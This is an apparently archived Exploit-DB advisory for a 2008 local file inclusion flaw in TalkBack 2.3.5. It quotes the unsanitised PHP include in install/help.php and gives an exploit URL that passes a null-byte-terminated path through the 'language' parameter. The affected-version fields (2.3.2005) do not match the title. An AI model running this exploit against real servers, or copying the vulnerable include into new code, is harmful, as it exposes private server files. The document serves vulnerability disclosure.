TalkBack 2.3.5 Local File Inclusion Vulnerability

vendor:

TalkBack

by:

NoGe

8.8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: TalkBack

Affected Version From: 2.3.2005

Affected Version To: 2.3.2005

Patch Exists: YES

Related CWE: N/A

CPE: a:scripts.oldguy.us:talkback:2.3.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TalkBack 2.3.5 Local File Inclusion Vulnerability

TalkBack version 2.3.5 is vulnerable to a Local File Inclusion vulnerability. This vulnerability is due to the application not properly sanitizing user-supplied input to the 'language' parameter of the 'help.php' script. An attacker can exploit this vulnerability to include arbitrary local files from the web server, resulting in the disclosure of sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

=============================================================================================================

  [o] TalkBack 2.3.5 Local File Inclusion Vulnerability

       Software : TalkBack version 2.3.5
       Vendor   : http://www.scripts.oldguy.us/talkback
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com

=============================================================================================================

  [o] Vulnerable file

       install/help.php

        include "../language/{$_REQUEST['language']}.php";



  [o] Exploit

       http://localhost/[path]/install/help.php?language=[LFI]%00


=============================================================================================================

  [o] Greetz

       supported by irc.nob0dy.net
       skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke
       H312Y yooogy mousekill }^-^{ martfella
       okegay OoN_Gay pagay (sungguh penyembunyian sebuah karakter dibalik makna kata) /me brb ngakak..  :) 
 
=============================================================================================================

# milw0rm.com [2008-07-28]